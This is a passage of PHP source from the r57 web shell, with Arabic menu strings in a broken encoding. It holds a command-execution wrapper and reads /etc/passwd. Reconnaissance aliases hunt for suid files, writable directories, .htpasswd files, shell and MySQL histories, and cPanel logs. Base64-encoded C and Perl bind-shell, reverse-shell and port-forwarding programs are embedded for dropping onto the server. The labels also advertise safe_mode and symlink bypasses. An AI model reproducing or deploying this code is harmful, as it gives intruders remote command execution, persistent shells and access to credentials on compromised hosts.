2342	'ar_err2'=>'ÎØÇÁ! áÇíãßä ÇáÇäÔÇÁ ',
2343	'ar_err3'=>'ÎØÇÁ! ÛíÑ ÞÇÏÑ Úáì ÇáÇÊÕÇá ÈÇáÇÝ Êí Èí',
2344	'ar_err4'=>'ÎØÇÁ ! áÇÊÓÊØíÚ ÇáÏÎæá Çáì ÓíÑÝÑ ÇáÇÝ Êí Èí',
2345	'ar_err5'=>'ÎØÇÁ ! áÇÊÓÊØíÚ ÊÛíÑ ÇáãÌáÏ Ýí ÇáÇÝ Êí Èí',
2346	'ar_err6'=>'ÎØÇÁ ! áÇÊÓÊØíÚ ÇÑÓÇá ÑÓÇáå',
2347	'ar_err7'=>'ÇáÈÑíÏ ÇÑÓá',
2348	'ar_text200'=>'copy()ÞÑÇÆÉ ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑÉ',
2349	'ar_text202'=>'ãÓÇÑ ÇáãáÝ ÇáãÑÇÏ ÞÑÇÆÊå',
2350	'ar_text300'=>'curl()ÞÑÇÆå ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑÉ',
2351	'ar_text203'=>'ini_restore()ÞÑÇÆÉ ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑÉ',
2352	'ar_text204'=>'error_log()ÒÑÇÚå ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑå',
2353	'ar_text205'=>'ÃÒÑÚ ÇáÔá Úáì åÐÇ ÇáãÓÇÑ',
2354	'ar_text206'=>'ÞÑÇÆå ãÍÊæíÇÊ ÇáãÌáÏ',
2355	'ar_text207'=>'ÞÑÇÆå ãÍÊæíÇÊ ÇáãÌáÏÇÊ Úä ØÑíÞ ËÛÑå reg_glob',
2356	'ar_text208'=>'ÊäÝíÐ ÇáÇæÇãÑ Ýí ÇáæÖÚ ÇáÇãä Úä ØÑíÞ ÇáÏæÇá',
2357	'ar_text209'=>'ÞÑÇÆå ãÍÊæíÇÊ ÇáãÌáÏÇÊ Úä ØÑíÞ ËÛÑå root',
2358	'ar_text210'=>'Ýß ÊÔÝíÑ ÇáÒäÏ ',
2359	'ar_text211'=>'::ÇÞÝÇá ÇáÓíÝ ãæÏ::',
2360	'ar_text212'=>'php.ini ÇÞÝÇá ÇáÓíÝ ãæÏ Úä ØÑíÞ ÒÑÚ ãáÝ',
2361	'ar_text213'=>'htacces ÅÞÝÇá ÇáãæÏ ÓßíæÑÊí Úä ØÑíÞ ÒÑÚ ãáÝ',
2362	'ar_text214'=>'ÃÓã ÇáÇÏãä',
2363	'ar_text215'=>'ÚäæÇä ÇáÓíÑÝÑ IRC ',
2364	'ar_text216'=>'# ÃÓã ÇáÛÑÝå ãÚ',
2365	'ar_text217'=>'ÇÓã ÇáÓíÑÝÑ ÇáãÎÊÑÞ',
2366	'ar_text218'=>'áÅíÞÇÝ ÇáÓíÝ ãæÏ ini_restore ÒÑÚ ãáÝ íÍÊæí Úáì ËÛÑå',
2367	'ar_text219'=>'ÓÍÈ ãáÝÇÊ Çáì ÇáÓíÑÝÑ æÊÛíÑ ÇÓãåÇ ÈÇáæÖÚ ÇáÇãä',
2368	'ar_text220'=>'ÇÓÊÚÑÇÖ ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑå symlink ÇáÎØæå ÇáÇæáì',
2369	'ar_text221'=>'ÖÛØ ÇáãáÝÇÊ áÊÍãíáåÇ ãä ÇáãæÞÚ(ÈÚÏ ÊÍãíáåÇ áÌåÇÒß ÛíÑ ÇãÊÏÇÏ ÇáãáÝ áÇãÊÏÇÏå ÇáÓÇÈÞ)1',
2370	'ar_text222'=>'ÇÓÊÚÑÇÖ ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑå symlink ÇáÎØæå ÇáËÇäíå',
2371	'ar_text223'=>'ÞÑÇÆå ÇáãáÝÇÊ Úä ØÑíÞ ÇáÏæÇá',
2372	'ar_text224'=>'PLUGIN ÞÑÇÆå ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑå ',
2373	);
2374	/*
2375	?????? ??????
2376	????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? )
2377	?? ?????? ???? ????????? ??? ???????? ???????.
2378	*/
2379	$aliases=array(
2380	'ÇáÈÍË Úä ãáÝÇÊ suid'=>'find / -type f -perm -04000 -ls',
2381	'ÇáÈÍË Úä ãáÝÇÊ suid Ýí ÇáãÌáÏ ÇáÍÇáí'=>'find . -type f -perm -04000 -ls',
2382	'ÇáÈÍË Úä ãáÝÇÊ suid'=>'find / -type f -perm -02000 -ls',
2383	'ÇáÈÍË Úä ãáÝÇÊ suid Ýí ÇáãÌáÏ ÇáÍÇáí'=>'find . -type f -perm -02000 -ls',
2384	'ÇáÈÍË Úä ãáÝÇÊ config.inc.php'=>'find / -type f -name config.inc.php',
2385	'ÇáÈÍË Úä ãáÝÇÊ config.inc.php Ýí ÇáãÌáÏ ÇáÍÇáí'=>'find . -type f -name config.inc.php',
2386	'ÇáÈÍË Úä ãáÝÇÊ config* ÈÌãíÚ ÇáÇãÊÏÇÏÇÊ'=>'find / -type f -name "config*"',
2387	'ÇáÈÍË Úä ãáÝÇÊ config* Ýí ÇáãÌáÏ ÇáÍÇáí'=>'find . -type f -name "config*"',
2388	'ÇáÈÍË Úä ÇáãáÝÇÊ ÇáÞÇÈáÉ ááßÊÇÈÉ'=>'find / -type f -perm -2 -ls',
2389	'ÇáÈÍË Úä ÇáãáÝÇÊ ÇáÞÇÈáÉ ááßÊÇÈÉ Ýí ÇáãÌáÏ ÇáÍÇáí'=>'find . -type f -perm -2 -ls',
2390	'ÇáÈÍË Úä ÇáãÌáÏÇÊ ÇáÞÇÈáÉ ááßÊÇÈÉ'=>'find / -type d -perm -2 -ls',
2391	'ÇáÈÍË Úä ÇáãÌáÏÇÊ ÇáÞÇÈáÉ ááßÊÇÈÉ Ýí ÇáãÓÇÑ ÇáÍÇáí'=>'find . -type d -perm -2 -ls',
2392	'ÇáÈÍË Úä ãáÝÇÊ æãÌáÏÇÊ ÞÇÈáÉ ááßÊÇÈÉ'=>'find / -perm -2 -ls',
2393	'ÇáÈÍË Úä ãáÝÇÊ æãÌáÏÇÊ Ýí ÇáãÓÇÑ ÇáÍÇáí'=>'find . -perm -2 -ls',
2394	'ÇáÈÍË Úä ãáÝÇÊ service.pwd'=>'find / -type f -name service.pwd',
2395	'ÇáÈÍË Úä ãáÝÇÊ service.pwd Ýí ÇáãÓÇÑ ÇáÍÇáí'=>'find . -type f -name service.pwd',
2396	'ÇáÈÍË Úä ßá ãáÝÇÊ ÇáÌÏÑÇä ÇáäÇÑíÉ .htpasswd'=>'find / -type f -name .htpasswd',
2397	'ÇáÈÍË Úä ÌãíÚ ãáÝÇÊ ÇáÌÏÑÇä ÇáäÇÑíÉ Ýí ÇáãÓÇÑ ÇáÍÇáí'=>'find . -type f -name .htpasswd',
2398	'ÇáÈÍË Úä ÌãíÚ ãáÝÇÊ .bash_history'=>'find / -type f -name .bash_history',
2399	'ÇáÈÍË Úä ÌãíÚ ãáÝÇÊ .bash_history Ýí ÇáãÓÇÑ ÇáÍÇáí'=>'find . -type f -name .bash_history',
2400	'ÇáÈÍË Úä ÌãíÚ ãáÝÇÊ .mysql_history'=>'find / -type f -name .mysql_history',
2401	'ÇáÈÍË Úä ÌãíÚ ãáÝÇÊ .mysql_history Ýí ÇáãÓÇÑ ÇáÍÇáí'=>'find . -type f -name .mysql_history',
2402	'ÇáÈÍË Úä ÌãíÚ ãáÝÇÊ .fetchmailrc'=>'find / -type f -name .fetchmailrc',
2403	'ÇáÈÍË Úä ÌãíÚ ãáÝÇÊ .fetchmailrc Ýí ÇáãÓÇÑ ÇáÍÇáí'=>'find . -type f -name .fetchmailrc',
2404	'ÇÎÑ ãáÝÇÊ ãÔÛáå Ýí ÇáäÙÇã'=>'lsattr -va',
2405	'ÑÄíÉ ÇáÈæÑÊÇÊ ÇáãÝÊæÍÉ Ýí ÇáÓíÑÝÑ'=>'netstat -an \| grep -i listen',
2406	'ÑÄíÉ ÍÇáÉ ÇáãÌáÏÇÊ æÇãßÇäíÉ ÇáÊäÝíÐ'=>'cat /etc/fstab',
2407	'ãÔÇåÏÉ ãáÝ ÇááæÞ áÏÎæá ÇáÓí ÈÇäá æÇáãæÇÞÚ Úáì ÇáÓíÑÝÑ'=>'cat /var/cpanel/accounting.log',
2408	'ÊÝÇÕíá ÇáÚãáíÇÊ ÇáÊí ÊÚãá ÇáÇä ÈÇáäÖÇã'=>'ps aux',
2409	'ÇáãÓÊÎÏãíä ÇáãÊÕáíä ÍÇáíÇ'=>'w',
2410	'ÇÎÑ ãÓÊÎÏãíä ÇÊÕáæ'=>'lastlog',
2411	'ÝÍÕ ÇÏæÇÊ ÇáÓÍÈ wget curl ..etc'=>'which wget curl w3m lynx',
2412	'ÝÍÕ ÇÏÇÉ ÇáÊÑÌãå gcc'=>'locate gcc',
2413
2414
2415
2416	'----------------------------------------------------------------------------------------------------'=>'ls -la'
2417	);
2418	$table_up1 = "<tr><td bgcolor=#272727><font face=tahoma size=-2><b><div align=center>:: ";
2419	$table_up2 = " ::</div></b></font></td></tr><tr><td>";
2420	$table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#333333>";
2421	$table_end1 = "</td></tr>";
2422	$arrow = " <font face=Webdings color=gray>4</font>";
2423	$lb = "<font color=black>[</font>";
2424	$rb = "<font color=black>]</font>";
2425	$font = "<font face=tahoma size=-2>";
2426	$ts = "<table class=table1 width=100% align=center>";
2427	$te = "</table>";
2428	$fs = "<form name=form method=POST>";
2429	$fe = "</form>";
2430
2431	if(isset($_GET['users']))
2432	{
2433	if(!$users=get_users()) { echo "<center><font face=tahoma size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; }
2434	else
2435	{
2436	echo '<center>';
2437	foreach($users as $user) { echo $user."<br>"; }
2438	echo '</center>';
2439	}
2440	echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
2441	}
2442
2443	if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
2444	$dir = @getcwd();
2445	$unix = 0;
2446	if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1;
2447	if(empty($dir))
2448	{
2449	$os = getenv('OS');
2450	if(empty($os)){ $os = php_uname(); }
2451	if(empty($os)){ $os ="-"; $unix=1; }
2452	else
2453	{
2454	if(@eregi("^win",$os)) { $unix = 0; }
2455	else { $unix = 1; }
2456	}
2457	}
2458	if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
2459	{
2460	echo $head;
2461	if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
2462	else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
2463	$sr->SearchText(0,0);
2464	$res = $sr->GetResultFiles();
2465	$found = $sr->GetMatchesCount();
2466	$titles = $sr->GetTitles();
2467	$r = "";
2468	if($found > 0)
2469	{
2470	$r .= "<TABLE width=100%>";
2471	foreach($res as $file=>$v)
2472	{
2473	$r .= "<TR>";
2474	$r .= "<TD colspan=2><font face=tahoma size=-2><b>".ws(3);
2475	$r .= (!$unix)? str_replace("/","\\",$file) : $file;
2476	$r .= "</b></font></ TD>";
2477	$r .= "</TR>";
2478	foreach($v as $a=>$b)
2479	{
2480	$r .= "<TR>";
2481	$r .= "<TD align=center><B><font face=tahoma size=-2>".$a."</font></B></TD>";
2482	$r .= "<TD><font face=tahoma size=-2>".ws(2).$b."</font></TD>";
2483	$r .= "</TR>\n";
2484	}
2485	}
2486	$r .= "</TABLE>";
2487	echo $r;
2488	}
2489	else
2490	{
2491	echo "<P align=center><B><font face=tahoma size=-2>".$lang[$language.'_text56']."</B></font></P>";
2492	}
2493	echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
2494	die();
2495	}
2496	if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }
2497	$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
2498	if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
2499	function ws($i)
2500	{
2501	return @str_repeat(" ",$i);
2502	}
2503	function ex($cfe)
2504	{
2505	$res = '';
2506	if (!empty($cfe))
2507	{
2508	if(function_exists('exec'))
2509	{
2510	@exec($cfe,$res);
2511	$res = join("\n",$res);
2512	}
2513	elseif(function_exists('shell_exec'))
2514	{
2515	$res = @shell_exec($cfe);
2516	}
2517	elseif(function_exists('system'))
2518	{
2519	@ob_start();
2520	@system($cfe);
2521	$res = @ob_get_contents();
2522	@ob_end_clean();
2523	}
2524	elseif(function_exists('passthru'))
2525	{
2526	@ob_start();
2527	@passthru($cfe);
2528	$res = @ob_get_contents();
2529	@ob_end_clean();
2530	}
2531	elseif(@is_resource($f = @popen($cfe,"r")))
2532	{
2533	$res = "";
2534	while(!@feof($f)) { $res .= @fread($f,1024); }
2535	@pclose($f);
2536	}
2537	}
2538	return $res;
2539	}
2540	function get_users()
2541	{
2542	$users = array();
2543	$rows=file('/etc/passwd');
2544	if(!$rows) return 0;
2545	foreach ($rows as $string)
2546	{
2547	$user = @explode(":",$string);
2548	if(substr($string,0,1)!='#') array_push($users,$user[0]);
2549	}
2550	return $users;
2551	}
2552	function err($n,$txt='')
2553	{
2554	echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#000000><font color=red face=tahoma size=-2><div align=center><b>';
2555	echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n];
2556	if(!empty($txt)) { echo " $txt"; }
2557	echo '</b></div></font></td></tr></table>';
2558	return null;
2559	}
2560	function perms($mode)
2561	{
2562	if (!$GLOBALS['unix']) return 0;
2563	if( $mode & 0x1000 ) { $type='p'; }
2564	else if( $mode & 0x2000 ) { $type='c'; }
2565	else if( $mode & 0x4000 ) { $type='d'; }
2566	else if( $mode & 0x6000 ) { $type='b'; }
2567	else if( $mode & 0x8000 ) { $type='-'; }
2568	else if( $mode & 0xA000 ) { $type='l'; }
2569	else if( $mode & 0xC000 ) { $type='s'; }
2570	else $type='u';
2571	$owner["read"] = ($mode & 00400) ? 'r' : '-';
2572	$owner["write"] = ($mode & 00200) ? 'w' : '-';
2573	$owner["execute"] = ($mode & 00100) ? 'x' : '-';
2574	$group["read"] = ($mode & 00040) ? 'r' : '-';
2575	$group["write"] = ($mode & 00020) ? 'w' : '-';
2576	$group["execute"] = ($mode & 00010) ? 'x' : '-';
2577	$world["read"] = ($mode & 00004) ? 'r' : '-';
2578	$world["write"] = ($mode & 00002) ? 'w' : '-';
2579	$world["execute"] = ($mode & 00001) ? 'x' : '-';
2580	if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
2581	if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
2582	if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
2583	$s=sprintf("%1s", $type);
2584	$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
2585	$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
2586	$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
2587	return trim($s);
2588	}
2589	function in($type,$name,$size,$value,$checked=0)
2590	{
2591	$ret = "<input type=".$type." name=".$name." ";
2592	if($size != 0) { $ret .= "size=".$size." "; }
2593	$ret .= "value=\"".$value."\"";
2594	if($checked) $ret .= " checked";
2595	return $ret.">";
2596	}
2597	function which($pr)
2598	{
2599	$path = ex("which $pr");
2600	if(!empty($path)) { return $path; } else { return $pr; }
2601	}
2602	function cf($fname,$text)
2603	{
2604	$w_file=@fopen($fname,"w") or err(0);
2605	if($w_file)
2606	{
2607	@fputs($w_file,@base64_decode($text));
2608	@fclose($w_file);
2609	}
2610	}
2611	function sr($l,$t1,$t2)
2612	{
2613	return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";
2614	}
2615	if (!@function_exists("view_size"))
2616	{
2617	function view_size($size)
2618	{
2619	if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
2620	elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
2621	elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
2622	else {$size = $size . " B";}
2623	return $size;
2624	}
2625	}
2626	function DirFilesR($dir,$types='')
2627	{
2628	$files = Array();
2629	if(($handle = @opendir($dir)))
2630	{
2631	while (false !== ($file = @readdir($handle)))
2632	{
2633	if ($file != "." && $file != "..")
2634	{
2635	if(@is_dir($dir."/".$file))
2636	$files = @array_merge($files,DirFilesR($dir."/".$file,$types));
2637	else
2638	{
2639	$pos = @strrpos($file,".");
2640	$ext = @substr($file,$pos,@strlen($file)-$pos);
2641	if($types)
2642	{
2643	if(@in_array($ext,explode(';',$types)))
2644	$files[] = $dir."/".$file;
2645	}
2646	else
2647	$files[] = $dir."/".$file;
2648	}
2649	}
2650	}
2651	@closedir($handle);
2652	}
2653	return $files;
2654	}
2655	class SearchResult
2656	{
2657	var $text;
2658	var $FilesToSearch;
2659	var $ResultFiles;
2660	var $FilesTotal;
2661	var $MatchesCount;
2662	var $FileMatschesCount;
2663	var $TimeStart;
2664	var $TimeTotal;
2665	var $titles;
2666	function SearchResult($dir,$text,$filter='')
2667	{
2668	$dirs = @explode(";",$dir);
2669	$this->FilesToSearch = Array();
2670	for($a=0;$a<count($dirs);$a++)
2671	$this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
2672	$this->text = $text;
2673	$this->FilesTotal = @count($this->FilesToSearch);
2674	$this->TimeStart = getmicrotime();
2675	$this->MatchesCount = 0;
2676	$this->ResultFiles = Array();
2677	$this->FileMatchesCount = Array();
2678	$this->titles = Array();
2679	}
2680	function GetFilesTotal() { return $this->FilesTotal; }
2681	function GetTitles() { return $this->titles; }
2682	function GetTimeTotal() { return $this->TimeTotal; }
2683	function GetMatchesCount() { return $this->MatchesCount; }
2684	function GetFileMatchesCount() { return $this->FileMatchesCount; }
2685	function GetResultFiles() { return $this->ResultFiles; }
2686	function SearchText($phrase=0,$case=0) {
2687	$qq = @explode(' ',$this->text);
2688	$delim = '\|';
2689	if($phrase)
2690	foreach($qq as $k=>$v)
2691	$qq[$k] = '\b'.$v.'\b';
2692	$words = '('.@implode($delim,$qq).')';
2693	$pattern = "/".$words."/";
2694	if(!$case)
2695	$pattern .= 'i';
2696	foreach($this->FilesToSearch as $k=>$filename)
2697	{
2698	$this->FileMatchesCount[$filename] = 0;
2699	$FileStrings = @file($filename) or @next;
2700	for($a=0;$a<@count($FileStrings);$a++)
2701	{
2702	$count = 0;
2703	$CurString = $FileStrings[$a];
2704	$CurString = @Trim($CurString);
2705	$CurString = @strip_tags($CurString);
2706	$aa = '';
2707	if(($count = @preg_match_all($pattern,$CurString,$aa)))
2708	{
2709	$CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
2710	$this->ResultFiles[$filename][$a+1] = $CurString;
2711	$this->MatchesCount += $count;
2712	$this->FileMatchesCount[$filename] += $count;
2713	}
2714	}
2715	}
2716	$this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
2717	}
2718	}
2719	function getmicrotime()
2720	{
2721	list($usec,$sec) = @explode(" ",@microtime());
2722	return ((float)$usec + (float)$sec);
2723	}
2724	$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
2725	A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
2726	GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
2727	b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
2728	pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
2729	NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
2730	ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
2731	ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
2732	7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
2733	9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
2734	2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
2735	dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
2736	lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
2737	$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
2738	VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
2739	JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
2740	TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
2741	lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
2742	Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
2743	Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
2744	lIENPTk47DQpleGl0IDA7DQp9DQp9";
2745	$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
2746	aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
2747	hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
2748	sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
2749	kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
2750	KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
2751	OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
2752	$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
2753	BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
2754	SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
2755	KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
2756	sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
2757	Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
2758	QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
2759	Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
2760	$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
2761	x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
2762	HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
2763	aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
2764	lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
2765	xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
2766	W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
2767	LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
2768	udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
2769	0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
